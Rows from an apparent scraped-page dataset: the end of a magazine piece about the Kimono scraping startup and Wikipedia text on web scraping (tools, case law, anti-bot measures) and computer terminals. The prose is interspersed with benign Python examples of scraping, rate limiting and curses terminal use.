APIs they want). They’ve already heard interest from a number of corporate clients, who see Kimono as a means to free the flow of data between departments and project teams without relying on an internal IT team to act as translator in-between. But the duo is already thinking even bigger picture. To them, Kimono’s greatest potential comes out as we move from today’s mobile phones and their attendant apps to the next generation of wearable devices and the internet of things. Kimono’s greatest potential comes out as we move to the next generation of wearables. “Smartphones are only a transitional point, Rowe says. “From there we go to smartwatches and Google Glass and other ways of interacting with data around you that don’t involve a screen. And to get from there to there to there you need to package up web data and make it consumable in all these different contexts. We’re trying to position Kimono to be the framework for that conversion. “When the killer apps finally start coming out for things like smartwatches and glasses, they’re not going to be made by the companies that have the most interesting data, he continues. “They’re going to come from the developers and designers who are thinking about it a little bit differently. If we suspend our doubts for a moment and peer into this crystal ball, Kimono starts to look like something very big indeed. In the scenario Rowe lays out, it takes root as a sort of connective tissue for an entirely new class of interactions and experiences something like a nervous system for the internet of things. 
You could imagine pointing Kimono at not just websites but other sorts of streams, making objects react to sound, say, or building applications that respond to live video feeds. At that point, you’re well beyond the esoteric realm of web scraping. “The ability to turn a website into an API is a very powerful thing, Rowe says. “Being able to turn anything into an API is epically powerful. |
562 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-10 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
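The fetch-then-extract cycle described here can be illustrated with a short sketch that downloads one page, pulls out the link text and URLs, and writes them to a CSV file that could be opened as a spreadsheet; the URL and output filename are placeholders.

import csv
import requests
from bs4 import BeautifulSoup

def scrape_links(url="https://example.com", output_csv="links.csv"):
    # Fetch: download the page as a browser would.
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    # Extract: parse the markup and copy out (text, href) pairs.
    soup = BeautifulSoup(response.text, "html.parser")
    rows = [(a.get_text(strip=True), a["href"]) for a in soup.find_all("a", href=True)]
    with open(output_csv, "w", newline="", encoding="utf-8") as f:
        writer = csv.writer(f)
        writer.writerow(["text", "href"])
        writer.writerows(rows)
    return rows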
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
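Two of the techniques above, regular-expression matching and XPath queries over a DOM tree, can be shown side by side in a few lines; the HTML snippet is made up, and lxml is used here only as one readily available XPath implementation.

import re
import lxml.html

html = "<html><body><p>Contact: info@example.com</p><a href='/about'>About</a></body></html>"

# grep-style extraction with a regular expression.
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)

# DOM parsing: build a tree and query it with XPath.
tree = lxml.html.fromstring(html)
hrefs = tree.xpath("//a/@href")

print(emails, hrefs)  # ['info@example.com'] ['/about']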
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
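As one example of the tools listed above, a minimal Scrapy spider looks roughly like the sketch below; the start URL points at a public practice site often used in Scrapy tutorials, and the CSS selectors are placeholders to adapt to whatever site is actually being scraped.

import scrapy

class QuoteSpider(scrapy.Spider):
    # Crawl a page, yield structured items, and follow pagination links.
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    def parse(self, response):
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        next_page = response.css("li.next a::attr(href)").get()
        if next_page is not None:
            yield response.follow(next_page, callback=self.parse)

# Run with:  scrapy runspider quote_spider.py -o quotes.json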
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
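One such administrator-side measure is per-client rate limiting; the toy sketch below keeps a sliding window of request timestamps per IP address and rejects requests once a budget is exhausted. The limits and the example address are arbitrary, and a production deployment would normally rely on the web server or a proxy rather than application code.

import time
from collections import defaultdict, deque

class RateLimiter:
    # Allow at most `limit` requests per `window` seconds for each client.
    def __init__(self, limit=60, window=60.0):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)

    def allow(self, client_ip):
        now = time.monotonic()
        recent = self.hits[client_ip]
        while recent and now - recent[0] > self.window:
            recent.popleft()
        if len(recent) >= self.limit:
            return False  # throttle or block this request
        recent.append(now)
        return True

# limiter = RateLimiter(limit=10, window=1.0)
# limiter.allow("203.0.113.5")  # True until the per-window budget is used up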
563 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_terminal | A computer terminal is an electronic or electromechanical hardware device that can be used for entering data into, and transcribing 1 data from, a computer or a computing system. 2 Most early computers only had a front panel to input or display bits and had to be connected to a terminal to print or input text through a keyboard. Teleprinters were used as early-day hard-copy terminals 3 4 and predated the use of a computer screen by decades. The computer would typically transmit a line of data which would be printed on paper, and accept a line of data from a keyboard over a serial or other interface. Starting in the mid 1970s with microcomputers such as the Sphere 1, Sol 20, and Apple I, display circuitry and keyboards began to be integrated into personal and workstation computer systems, with the computer handling character generation and outputting to a CRT display such as a computer monitor or, sometimes, a consumer TV, but most larger computers continued to require terminals. Early terminals were inexpensive devices but very slow compared to punched cards or paper tape for input; with the advent of time-sharing systems, terminals slowly pushed these older forms of interaction from the industry. Related development were the improvement of terminal technology and the introduction of inexpensive video displays. Early Teletypes only printed out with a communications speed of only 75 baud or 10 5 bit characters per second, and by the 1970s speeds of video terminals had improved to 2400 or 9600 2400 bit s. Similarly, the speed of remote batch terminals had improved to 4800 bit s at the beginning of the decade and 19.6 kbps by the end of the decade, with higher speeds possible on more expensive terminals. The function of a terminal is typically confined to transcription and input of data; a device with significant local, programmable data-processing capability may be called a "smart terminal" or fat client. A terminal that depends on the host computer for its processing power is called a "dumb terminal" 5 or a thin client. 6 7 In the era of serial (RS 232) terminals there was a conflicting usage of the term "smart terminal" as a dumb terminal with no user-accessible local computing power but a particularly rich set of control codes for manipulating the display; this conflict was not resolved before hardware serial terminals became obsolete. A personal computer can run terminal emulator software that replicates functions of a real-world terminal, sometimes allowing concurrent use of local programs and access to a distant terminal host system, either over a direct serial connection or over a network using, e.g., SSH. Today few if any dedicated computer terminals are being manufactured, as time sharing on large computers has been replaced by personal computers, handheld devices and workstations with graphical user interfaces. User interactions with servers use either software such as Web browsers, or terminal emulators, with connections over high-speed networks. The console of Konrad Zuse's Z3 had a keyboard in 1941, as did the Z4 in 1942 1945. However, these consoles could only be used to enter numeric inputs and were thus analogous to those of calculating machines; programs, commands, and other data were entered via paper tape. Both machines had a row of display lamps for results. 
In 1956, the Whirlwind Mark I computer became the first computer equipped with a keyboard-printer combination with which to support direct input 4 of data and commands and output of results. That device was a Friden Flexowriter, which would continue to serve this purpose on many other early computers well into the 1960s. Early user terminals connected to computers were, like the Flexowriter, electromechanical teleprinters teletypewriters (TeleTYpewriter, TTY), such as the Teletype Model 33, originally used for telegraphy; early Teletypes were typically configured as Keyboard Send-Receive (KSR) or Automatic Send-Receive (ASR). Some terminals, such as the ASR Teletype models, included a paper tape reader and punch which could record output such as a program listing. The data on the tape could be re-entered into the computer using the tape reader on the teletype, or printed to paper. Teletypes used the current loop interface that was already used in telegraphy. A less expensive Read Only (RO) configuration was available for the Teletype. Custom-designs keyboard printer terminals that came later included the IBM 2741 (1965) 8 and the DECwriter (1970). 9 Respective top speeds of teletypes, IBM 2741 and the LA30 (an early DECwriter) were 10, 15 and 30 characters per second. Although at that time "paper was king" 9 10 the speed of interaction was relatively limited. The DECwriter was the last major printing-terminal product. It faded away after 1980 under pressure from video display units (VDUs), with the last revision (the DECwriter IV of 1982) abandoning the classic teletypewriter form for one more resembling a desktop printer. A video display unit (VDU) displays information on a screen rather than printing text to paper and typically uses a cathode-ray tube (CRT). VDUs in the 1950s were typically designed for displaying graphical data rather than text and were used in, e.g., experimental computers at institutions like MIT; computers used in academia, government and business, sold under brand names like DEC, ERA, IBM and UNIVAC; military computers supporting specific defence applications such as ballistic missile warning systems and radar air defence coordination systems like BUIC and SAGE. Two early landmarks in the development of the VDU were the Univac Uniscope 11 12 13 and the IBM 2260, 14 both in 1964. These were block-mode terminals designed to display a page at a time, using proprietary protocols; in contrast to character-mode devices, they enter data from the keyboard into a display buffer rather than transmitting them immediately. In contrast to later character-mode devices, the Uniscope used synchronous serial communication over an EIA RS 232 interface to communicate between the multiplexer and the host, while the 2260 used either a channel connection or asynchronous serial communication between the 2848 and the host. The 2265, related to the 2260, also used asynchronous serial communication. The Datapoint 3300 from Computer Terminal Corporation, announced in 1967 and shipped in 1969, was a character-mode device that emulated a Model 33 Teletype. This reflects the fact that early character-mode terminals were often deployed to replace teletype machines as a way to reduce operating costs. The next generation of VDUs went beyond teletype emulation with an addressable cursor that gave them the ability to paint two-dimensional displays on the screen. Very early VDUs with cursor addressibility included the VT05 and the Hazeltine 2000 operating in character mode, both from 1970. 
Despite this capability, early devices of this type were often called "Glass TTYs". 15 Later, the term "glass TTY" tended to be restrospectively narrowed to devices without full cursor addressibility. The classic era of the VDU began in the early 1970s and was closely intertwined with the rise of time sharing computers. Important early products were the ADM 3A, VT52, and VT100. These devices used no complicated CPU, instead relying on individual logic gates, LSI chips, or microprocessors such as the Intel 8080. This made them inexpensive and they quickly became extremely popular input-output devices on many types of computer system, often replacing earlier and more expensive printing terminals. After 1970 several suppliers gravitated to a set of common standards: The experimental era of serial VDUs culminated with the VT100 in 1978. By the early 1980s, there were dozens of manufacturers of terminals, including Lear-Siegler, ADDS, Data General, DEC, Hazeltine Corporation, Heath Zenith, Hewlett-Packard, IBM, TeleVideo, Volker-Craig, and Wyse, many of which had incompatible command sequences (although many used the early ADM 3 as a starting point). The great variations in the control codes between makers gave rise to software that identified and grouped terminal types so the system software would correctly display input forms using the appropriate control codes; In Unix-like systems the termcap or terminfo files, the stty utility, and the TERM environment variable would be used; in Data General's Business BASIC software, for example, at login-time a sequence of codes were sent to the terminal to try to read the cursor's position or the 25th line's contents using a sequence of different manufacturer's control code sequences, and the terminal-generated response would determine a single-digit number (such as 6 for Data General Dasher terminals, 4 for ADM 3A 5 11 12 terminals, 0 or 2 for TTYs with no special features) that would be available to programs to say which set of codes to use. The great majority of terminals were monochrome, manufacturers variously offering green, white or amber and sometimes blue screen phosphors. (Amber was claimed to reduce eye strain). Terminals with modest color capability were also available but not widely used; for example, a color version of the popular Wyse WY50, the WY350, offered 64 shades on each character cell. VDUs were eventually displaced from most applications by networked personal computers, at first slowly after 1985 and with increasing speed in the 1990s. However, they had a lasting influence on PCs. The keyboard layout of the VT220 terminal strongly influenced the Model M shipped on IBM PCs from 1985, and through it all later computer keyboards. Although flat-panel displays were available since the 1950s, cathode-ray tubes continued to dominate the market until the personal computer had made serious inroads into the display terminal market. By the time cathode-ray tubes on PCs were replaced by flatscreens after the year 2000, the hardware computer terminal was nearly obsolete. A character-oriented terminal is a type of computer terminal that communicates with its host one character at a time, as opposed to a block-oriented terminal that communicates in blocks of data. It is the most common type of data terminal, because it is easy to implement and program. Connection to the mainframe computer or terminal server is achieved via RS 232 serial links, Ethernet or other proprietary protocols. Character-oriented terminals can be "dumb" or "smart". 
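The terminfo/termcap mechanism described above is still available on Unix-like systems through Python's standard curses bindings; the sketch below looks up this terminal's own clear-screen and cursor-position capabilities, keyed by the TERM environment variable, instead of hard-coding any one manufacturer's control codes.

import curses
import sys

curses.setupterm()  # consults the terminfo entry named by $TERM

clear_screen = curses.tigetstr("clear")   # clear-screen capability
move_cursor = curses.tigetstr("cup")      # cursor-position capability

if clear_screen:
    sys.stdout.buffer.write(clear_screen)
if move_cursor:
    # tparm substitutes the row and column parameters for this terminal type.
    sys.stdout.buffer.write(curses.tparm(move_cursor, 5, 10))
sys.stdout.buffer.write(b"hello from row 5, column 10\n")
sys.stdout.buffer.flush()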
Dumb terminals 5 are those that can interpret a limited number of control codes (CR, LF, etc.) but do not have the ability to process special escape sequences that perform functions such as clearing a line, clearing the screen, or controlling cursor position. In this context dumb terminals are sometimes dubbed glass Teletypes, for they essentially have the same limited functionality as does a mechanical Teletype. This type of dumb terminal is still supported on modern Unix-like systems by setting the environment variable TERM to dumb. Smart or intelligent terminals are those that also have the ability to process escape sequences, in particular the VT52, VT100 or ANSI escape sequences. A text terminal, or often just terminal (sometimes text console) is a serial computer interface for text entry and display. Information is presented as an array of pre-selected formed characters. When such devices use a video display such as a cathode-ray tube, they are called a "video display unit" or "visual display unit" (VDU) or "video display terminal" (VDT). The system console is often 16 a text terminal used to operate a computer. Modern computers have a built-in keyboard and display for the console. Some Unix-like operating systems such as Linux and FreeBSD have virtual consoles to provide several text terminals on a single computer. The fundamental type of application running on a text terminal is a command-line interpreter or shell, which prompts for commands from the user and executes each command after a press of Return. 17 This includes Unix shells and some interactive programming environments. In a shell, most of the commands are small applications themselves. Another important application type is that of the text editor. A text editor typically occupies the full area of display, displays one or more text documents, and allows the user to edit the documents. The text editor has, for many uses, been replaced by the word processor, which usually provides rich formatting features that the text editor lacks. The first word processors used text to communicate the structure of the document, but later word processors operate in a graphical environment and provide a WYSIWYG simulation of the formatted output. However, text editors are still used for documents containing markup such as DocBook or LaTeX. Programs such as Telix and Minicom control a modem and the local terminal to let the user interact with remote servers. On the Internet, telnet and ssh work similarly. In the simplest form, a text terminal is like a file. Writing to the file displays the text and reading from the file produces what the user enters. In Unix-like operating systems, there are several character special files that correspond to available text terminals. For other operations, there are special escape sequences, control characters and termios functions that a program can use, most easily via a library such as ncurses. For more complex operations, the programs can use terminal specific ioctl system calls. For an application, the simplest way to use a terminal is to simply write and read text strings to and from it sequentially. The output text is scrolled, so that only the last several lines (typically 24) are visible. Unix systems typically buffer the input text until the Enter key is pressed, so the application receives a ready string of text. In this mode, the application need not know much about the terminal. For many interactive applications this is not sufficient. 
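The point that a text terminal behaves like a file can be demonstrated in a few lines on a Unix-like system, where the controlling terminal is exposed as the character special file /dev/tty: writing to it displays text, and reading from it returns what the user types once Enter is pressed.

with open("/dev/tty", "w") as tty_out, open("/dev/tty", "r") as tty_in:
    tty_out.write("What is your name? ")
    tty_out.flush()                      # input is line-buffered until Enter
    name = tty_in.readline().strip()
    tty_out.write("Hello, %s\n" % name)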
One of the common enhancements is command-line editing (assisted with such libraries as readline); it also may give access to command history. This is very helpful for various interactive command-line interpreters. Even more advanced interactivity is provided with full-screen applications. Those applications completely control the screen layout; also they respond to key-pressing immediately. This mode is very useful for text editors, file managers and web browsers. In addition, such programs control the color and brightness of text on the screen, and decorate it with underline, blinking and special characters (e.g. box-drawing characters). To achieve all this, the application must deal not only with plain text strings, but also with control characters and escape sequences, which allow moving the cursor to an arbitrary position, clearing portions of the screen, changing colors and displaying special characters, and also responding to function keys. The great problem here is that there are many different terminals and terminal emulators, each with its own set of escape sequences. In order to overcome this, special libraries (such as curses) have been created, together with terminal description databases, such as Termcap and Terminfo. A block-oriented terminal or block mode terminal is a type of computer terminal that communicates with its host in blocks of data, as opposed to a character-oriented terminal that communicates with its host one character at a time. A block-oriented terminal may be card-oriented, display-oriented, keyboard-display, keyboard-printer, printer or some combination. The IBM 3270 is perhaps the most familiar implementation of a block-oriented display terminal, 18 but most mainframe computer manufacturers and several other companies produced them. The description below is in terms of the 3270, but similar considerations apply to other types. Block-oriented terminals typically incorporate a buffer which stores one screen or more of data, and also stores data attributes, not only indicating appearance (color, brightness, blinking, etc.) but also marking the data as being enterable by the terminal operator vs. protected against entry, as allowing the entry of only numeric information vs. allowing any characters, etc. In a typical application the host sends the terminal a preformatted panel containing both static data and fields into which data may be entered. The terminal operator keys data, such as updates in a database entry, into the appropriate fields. When entry is complete (or ENTER or PF key pressed on 3270s), a block of data, usually just the data entered by the operator (modified data), is sent to the host in one transmission. The 3270 terminal buffer (at the device) could be updated on a single character basis, if necessary, because of the existence of a "set buffer address order" (SBA), that usually preceded any data to be written overwritten within the buffer. A complete buffer could also be read or replaced using the READ BUFFER command or WRITE command (unformatted or formatted in the case of the 3270). Block-oriented terminals cause less system load on the host and less network traffic than character-oriented terminals. They also appear more responsive to the user, especially over slow connections, since editing within a field is done locally rather than depending on echoing from the host system. Early terminals had limited editing capabilities 3270 terminals, for example, only could check entries as valid numerics. 
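As a concrete illustration of the curses library and terminal description databases mentioned above, here is a minimal Python sketch that draws a bordered full-screen page and waits for a single keypress. It assumes it is run in a real terminal or terminal emulator; curses consults terminfo via the TERM variable and restores the screen state on exit.

import curses

def main(stdscr):
    curses.curs_set(0)                        # hide the cursor
    stdscr.clear()
    stdscr.box()                              # border drawn with box-drawing characters
    stdscr.addstr(1, 2, "Full-screen mode via curses", curses.A_BOLD)
    stdscr.addstr(3, 2, "Press any key to exit.", curses.A_UNDERLINE)
    stdscr.refresh()
    stdscr.getch()                            # react to a keypress immediately (no Enter)

curses.wrapper(main)                          # sets up the terminal, runs main, then restores it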
19 Subsequent "smart" or "intelligent" terminals incorporated microprocessors and supported more local processing. Programmers of block-oriented terminals often used the technique of storing context information for the transaction in progress on the screen, possibly in a hidden field, rather than depending on a running program to keep track of status. This was the precursor of the HTML technique of storing context in the URL as data to be passed as arguments to a CGI program. Unlike a character-oriented terminal, where typing a character into the last position of the screen usually causes the terminal to scroll down one line, entering data into the last screen position on a block-oriented terminal usually causes the cursor to wrap— move to the start of the first enterable field. Programmers might "protect" the last screen position to prevent inadvertent wrap. Likewise a protected field following an enterable field might lock the keyboard and sound an audible alarm if the operator attempted to enter more data into the field than allowed. A graphical terminal can display images as well as text. Graphical terminals 23 are divided into vector-mode terminals, and raster mode. A vector-mode display directly draws lines on the face of a cathode-ray tube under control of the host computer system. The lines are continuously formed, but since the speed of electronics is limited, the number of concurrent lines that can be displayed at one time is limited. Vector-mode displays were historically important but are no longer used. Practically all modern graphic displays are raster-mode, descended from the picture scanning techniques used for television, in which the visual elements are a rectangular array of pixels. Since the raster image is only perceptible to the human eye as a whole for a very short time, the raster must be refreshed many times per second to give the appearance of a persistent display. The electronic demands of refreshing display memory meant that graphic terminals were developed much later than text terminals, and initially cost much more. 24 25 Most terminals today when? are graphical; that is, they can show images on the screen. The modern term for graphical terminal is "thin client". citation needed A thin client typically uses a protocol like X11 for Unix terminals, or RDP for Microsoft Windows. The bandwidth needed depends on the protocol used, the resolution, and the color depth. Modern graphic terminals allow display of images in color, and of text in varying sizes, colors, and fonts (type faces). clarification needed In the early 1990s, an industry consortium attempted to define a standard, AlphaWindows, that would allow a single CRT screen to implement multiple windows, each of which was to behave as a distinct terminal. Unfortunately, like I2O, this suffered from being run as a closed standard: non-members were unable to obtain even minimal information and there was no realistic way a small company or independent developer could join the consortium. citation needed An intelligent terminal 26 does its own processing, usually implying a microprocessor is built in, but not all terminals with microprocessors did any real processing of input: the main computer to which it was attached would have to respond quickly to each keystroke. The term "intelligent" in this context dates from 1969. 27 Notable examples include the IBM 2250, predecessor to the IBM 3250 and IBM 5080, and IBM 2260, 28 predecessor to the IBM 3270, introduced with System 360 in 1964. 
